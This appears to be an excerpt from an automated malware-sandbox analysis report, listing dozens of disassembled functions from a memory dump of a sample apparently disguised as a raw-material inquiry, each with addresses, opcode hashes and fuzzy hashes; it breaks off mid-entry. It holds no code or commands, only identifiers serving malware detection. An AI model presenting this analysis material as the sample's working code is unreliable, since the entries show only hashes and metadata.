                                                Function 014FC0F0 Relevance: .0, Instructions: 39COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: aef279637f63924ff87958c827278d8f7c3f947dfb8dec2200fe7f318bbfb946
                                                • Instruction ID: c4192b562eca99f51f2b831cc75ce5be75a5bf8e460feba051b0cf0315e46c89
                                                • Opcode Fuzzy Hash: aef279637f63924ff87958c827278d8f7c3f947dfb8dec2200fe7f318bbfb946
                                                • Instruction Fuzzy Hash: 7EF08B312002455BF71091088E61F233299F7C0251FA4802FEB048F7E1EA30DC018790
                                                Function 0153656A Relevance: .0, Instructions: 39COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f6194b707217610295005ba60bc9de26fdce0c2b69e54ee83283e58ad0f1dfdb
                                                • Instruction ID: 3186da9d9bf228e4b64b485f12ca811b343e223e18254a0a6c2d8f8dc446c24c
                                                • Opcode Fuzzy Hash: f6194b707217610295005ba60bc9de26fdce0c2b69e54ee83283e58ad0f1dfdb
                                                • Instruction Fuzzy Hash: 3101A470301682ABF3239B2CDD49B293BE4BB80B44F8905A8BA11CF6D6D728D5418620
                                                Function 015A437C Relevance: .0, Instructions: 37COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                • Instruction ID: 8b56e942056a8d61313d565c7564f9e2350c9a45856b0c04c185df3303826181
                                                • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                • Instruction Fuzzy Hash: DBF0E93538191347E736AAAE9420B2EAA95BFD0A01B5D452E9611CF680DFA0D8848790
                                                Function 0158E872 Relevance: .0, Instructions: 36COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                • Instruction ID: 60bef89b9fca69d2457d16de869cc19b9564c1954646f1a90ad6516af3a1388f
                                                • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                • Instruction Fuzzy Hash: 7EF054337255129BE321AA4DCC81F1EB7B8FFD5A60F190465A604BF264C760EC018BD0
                                                Function 0158C89D Relevance: .0, Instructions: 36COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 21c69c2e999c2eaf3989457f64ee8b4670b7a9ae62327c6103d153abf119fc1c
                                                • Instruction ID: bc4b91c90e69b3d9f403582b0c6e41041cb4f2d764b90de61874d04aff60b0e2
                                                • Opcode Fuzzy Hash: 21c69c2e999c2eaf3989457f64ee8b4670b7a9ae62327c6103d153abf119fc1c
                                                • Instruction Fuzzy Hash: 63F0AF706193059FC310EF68C445A1ABBE4FF98714F804A5AB898DF394E634E900CB96
                                                Function 01530854 Relevance: .0, Instructions: 35COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                • Instruction ID: b5a31e11784fc009b6626e7faa49017d5106d6a82258844984ad22aafd89a6f4
                                                • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                • Instruction Fuzzy Hash: 45F0B472610205AFE714DF25CC01F56B7E9FFE8344F148478A545DB2A4FAB0ED01C694
                                                Function 0158C912 Relevance: .0, Instructions: 34COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c4c5c6bbb829ac9a8555ef3a46bf1005edeab1a62c517690495cb383f9a3dac2
                                                • Instruction ID: 11ee30f95303c0fe12f2ec075d6087e4ba2f8545424b9b313a179280fa95098d
                                                • Opcode Fuzzy Hash: c4c5c6bbb829ac9a8555ef3a46bf1005edeab1a62c517690495cb383f9a3dac2
                                                • Instruction Fuzzy Hash: 17F06270A0124ADFDB04EFA9C515A9EB7F4FF58304F108059B955EF395DA34EA01CB64
                                                Function 015047FB Relevance: .0, Instructions: 33COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4e2489cca3916a97ac56508a2b58c07dadae15216ffa14c812f99e9ed72864f5
                                                • Instruction ID: dd7dc83b19786d677fb56cef4a83d51551bdf852a90e8bd7036334f464814adc
                                                • Opcode Fuzzy Hash: 4e2489cca3916a97ac56508a2b58c07dadae15216ffa14c812f99e9ed72864f5
                                                • Instruction Fuzzy Hash: 05F024B19126D19FE733CBECC054B25BBC4BF00621F088CAACB498F582C3B0DA80C600
                                                Function 015C0115 Relevance: .0, Instructions: 32COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f928e697f8e4deb2a171a2220a118b0732ae898b477a884541903796e3bf3a86
                                                • Instruction ID: 0dda052f1da670786bb3570782badf91aca182049decef337c03dfc8ab3d2311
                                                • Opcode Fuzzy Hash: f928e697f8e4deb2a171a2220a118b0732ae898b477a884541903796e3bf3a86
                                                • Instruction Fuzzy Hash: 16F0273A41A6C28ECF325F6C6D903E9AB64F7C1810F0A144DD4B19F249C6748487D320
                                                Function 0153C5ED Relevance: .0, Instructions: 31COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 951622d772ec82285812cdd6cc25de11287970d39adf58fac22c360b73f11714
                                                • Instruction ID: fae5a222a02b5395d31e9f8cbcad722a65a82d09b3549afa78cab65af139b861
                                                • Opcode Fuzzy Hash: 951622d772ec82285812cdd6cc25de11287970d39adf58fac22c360b73f11714
                                                • Instruction Fuzzy Hash: 33F097714116819FEB32C76CC448B19BBD8FBC07A0F089827C402DF522C730F880DA40
                                                Function 01542619 Relevance: .0, Instructions: 31COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                • Instruction ID: cab7c6798bd3b4e557b9005e9cb254ec9c1b24b24a0aa16edffbb17134d1edd6
                                                • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                • Instruction Fuzzy Hash: DDE0D8323006026BE712AE599CC0F477B6EFFD6B14F04407DB5045F251CAF2DC0986A4
                                                Function 01596030 Relevance: .0, Instructions: 29COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                • Instruction ID: 8eb95827a5f878d95edfa2124e6a256311efee0ec9e10a345453af984fe58397
                                                • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                • Instruction Fuzzy Hash: E3F0A0721002049FE7218F09DD84F52BBF8FB45364F05C026E6088F160E339EC44CBA1
                                                Function 01500710 Relevance: .0, Instructions: 28COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                • Instruction ID: 0536b0bd079a676db0b8161acd8523867a76c57cc922ee66b1094eac1afcb9ef
                                                • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                • Instruction Fuzzy Hash: 32F0E5392047419FEB67CF59C050A997BE4FB413A0B000455FC428F381D735E981CB50
                                                Function 015349D0 Relevance: .0, Instructions: 28COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                • Instruction ID: ba3b67312ab9ddd8fbefb60c90ebb1cab9dcf064dd61e9f37d21a64502ec2e16
                                                • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                • Instruction Fuzzy Hash: FBE0D832254146AFD3212A598800B7A7BE7FBD17A0F150429E200CF150DBF0DC42C7D8
                                                Function 015D4164 Relevance: .0, Instructions: 27COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 112f46e59a7665649f46ea30997378864f95fed2ae5f09b6f9a3bd72ce31da40
                                                • Instruction ID: 6b87887ec5b1c106051fa4555df8540958aabe346f9853377e62d971a2be22fd
                                                • Opcode Fuzzy Hash: 112f46e59a7665649f46ea30997378864f95fed2ae5f09b6f9a3bd72ce31da40
                                                • Instruction Fuzzy Hash: 34F0A931A26A928FE772D7BCE280B5E77E0BB50A20F0A05A4D4108FD12C330EC80C750
                                                Function 015A678E Relevance: .0, Instructions: 27COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                • Instruction ID: 5ce1dfb9cb368c16d29eddfe25e969e0b0169d1732906491026ab71fd4ae9c05
                                                • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                • Instruction Fuzzy Hash: 01E0DF72A40120BBEB22A7998D05F9EBEACEBD0EA0F090054B600EB0E0E530DE00C6D0
                                                Function 015D08C0 Relevance: .0, Instructions: 25COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                • Instruction ID: 24ec77fb28a4277a6f311d75e137f4cf1c66b67de339270e96584310559d4652
                                                • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                • Instruction Fuzzy Hash: 49E09B316407508BCB359A1DC141A57BFE8FFD5660F15806DE9054B653C231F842C7D0
                                                Function 015025E0 Relevance: .0, Instructions: 23COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 77fea782f90e908d5849556e5723434a8bf9381b33aed84e6117b979eb7271d1
                                                • Instruction ID: 77db1ecf33e83d1968411c7b3647072c6c5afd4c7a6ea7d7d1b77631bf111187
                                                • Opcode Fuzzy Hash: 77fea782f90e908d5849556e5723434a8bf9381b33aed84e6117b979eb7271d1
                                                • Instruction Fuzzy Hash: 5DE092321009559BC322BB69DD01F8A779AFFA0364F014529B1555B190CB30A810C784
                                                Function 015BA456 Relevance: .0, Instructions: 23COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                • Instruction ID: cc5bdb510506bcc945fbc3a5ca992e7bf13243110a67f2643ad920b33b4eb905
                                                • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                • Instruction Fuzzy Hash: 00E01232010A52DFE7366F2AD958B967BE1FFD0715F148C2DE1961A5F0C7B998C1CA40
                                                Function 01584000 Relevance: .0, Instructions: 22COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                • Instruction ID: 9d0710d0dec7c89492290f025d6a4fd0e662e732ca51873ca2134616616a8e25
                                                • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                • Instruction Fuzzy Hash: A1E04E75300346DBE715DF19C054B667BA6BFD5A50F28C069A9488F205EB36A8438A51
                                                Function 0153CA38 Relevance: .0, Instructions: 22COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 99961128529c2c2366503889f7dd24f8cf339b7edc233768a528b2d7d8b00513
                                                • Instruction ID: 5dde8d364fc0bd3b9c41b3eee0e7c67d01ffeb8a497e1471e1cb3c270db7d1b1
                                                • Opcode Fuzzy Hash: 99961128529c2c2366503889f7dd24f8cf339b7edc233768a528b2d7d8b00513
                                                • Instruction Fuzzy Hash: 11D02B334810316ECB36F128BC04F973B99BBC1220F024862F108FF051D5A4CC8292C4
                                                Function 014F823B Relevance: .0, Instructions: 21COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                • Instruction ID: d8160d887d8707c640ff750a91d3553e02de7a50d4d3b8da8fef432368c8c720
                                                • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                • Instruction Fuzzy Hash: 78E08C35000A22EFDB322F15EC10B5276A1FF94B64F22482EF1820E1B58770A882CA44
                                                Function 01502050 Relevance: .0, Instructions: 20COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e283f87162f6299c2fafbd74fa34d62baffe4a0371ae0674834acd6e55ec6592
                                                • Instruction ID: d227a4101d734cee793ed6823d81273b232a84c6c42746944e83b18815c359be
                                                • Opcode Fuzzy Hash: e283f87162f6299c2fafbd74fa34d62baffe4a0371ae0674834acd6e55ec6592
                                                • Instruction Fuzzy Hash: D7E08C321004516BC212FA9DDD11E4A739AFFE4260F010125B1518B2D4CA20AC00C794
                                                Function 01538A90 Relevance: .0, Instructions: 20COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                • Instruction ID: 5b76b95668db4e5209a494717d3f9771c412364b93628cf3f688421852be48f2
                                                • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                • Instruction Fuzzy Hash: F1E08633111A1487C729DE18D511B7677E4FF85730F09473EA6138B780C574E544C794
                                                Function 0153E59C Relevance: .0, Instructions: 16COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                • Instruction ID: fdc6c5168658ae78a24ec798ea8c8354a35ca25e319609f08aee202c0f0880e1
                                                • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                • Instruction Fuzzy Hash: BFD0A932214620ABE772AA1CFC00FC333E8BB88734F060459B008CB060C360AC81CA84
                                                Function 0157E908 Relevance: .0, Instructions: 16COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                • Instruction ID: c2f70c7af9c086d308a2dd130b472b2ad421263f3537a7ddf7dd01ab4087ede8
                                                • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                • Instruction Fuzzy Hash: 55E0EC369507859BDF53DF99D641F5EBBB9FF94B40F150458A1085F660C724AD00CB40
                                                Function 014FA0E3 Relevance: .0, Instructions: 15COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                • Instruction ID: e4cf40c1675dcc46ab3276b7e4d1d14419492cfddba3404cbbbe6c79fa61af2d
                                                • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                • Instruction Fuzzy Hash: EAD0223222203197EB295A55A910F637905EFC0AA4F2A002E360E93A10C0248C43C2E0
                                                Function 0153A830 Relevance: .0, Instructions: 14COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                • Instruction ID: 39d9677fa07caf9976872f2501a548045004a4de0db184b6f3a45d0984885ecb
                                                • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                • Instruction Fuzzy Hash: CDD012371E054DBBDB129F66DC01F957BA9FBA4BA0F444020B5048B5A0D63AE950D584
                                                Function 0153CA24 Relevance: .0, Instructions: 14COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 284261957f1f85fda1072669877ff66ee0ccd73ad40cac0ed56651fe9040a1fe
                                                • Instruction ID: 9d0c7c412d7e19e6337f9bbbdede60746cd178c271b60b2abef6165b593693be
                                                • Opcode Fuzzy Hash: 284261957f1f85fda1072669877ff66ee0ccd73ad40cac0ed56651fe9040a1fe
                                                • Instruction Fuzzy Hash: E0D0A730921002CBDF17DF48C515D2E37F1FF50644B40006CE701AE420E364EC02C710
                                                Function 015102A0 Relevance: .0, Instructions: 13COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                • Instruction ID: 67fda6a2950abfacc4a63a63c04d565fc5132d38f88c4cca0721d149f1f07922
                                                • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                • Instruction Fuzzy Hash: FFD0C935212E80CFE71BDB0CC5A4B5933E8BB44B44F814890F401CFB66D62CD980CA40
                                                Function 0153C700 Relevance: .0, Instructions: 12COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                • Instruction ID: 71e1e3fa1bb945f03bd345fdcfc4e1263768369286aaf0b82851d55d7fa269d6
                                                • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                • Instruction Fuzzy Hash: 68C012322A0648AFD712AA99CD01F027BA9FBA8B50F000021F2048B670D631E820EA84
                                                Function 01520310 Relevance: .0, Instructions: 11COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                • Instruction ID: 0d8b178a3c63bce289dcf6604683ea3234637f686c4fa940e751b43eb3d81bfb
                                                • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                • Instruction Fuzzy Hash: 6ED01237100249EFCB05DF45C890D9A772AFBD8710F108019FD190B6508A31ED62DA90
                                                Function 01500750 Relevance: .0, Instructions: 9COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                • Instruction ID: 60bec5e2460bf5cc3813db8ad4ecde4f89bf0c4b987a4ef364b03e229f54d5dd
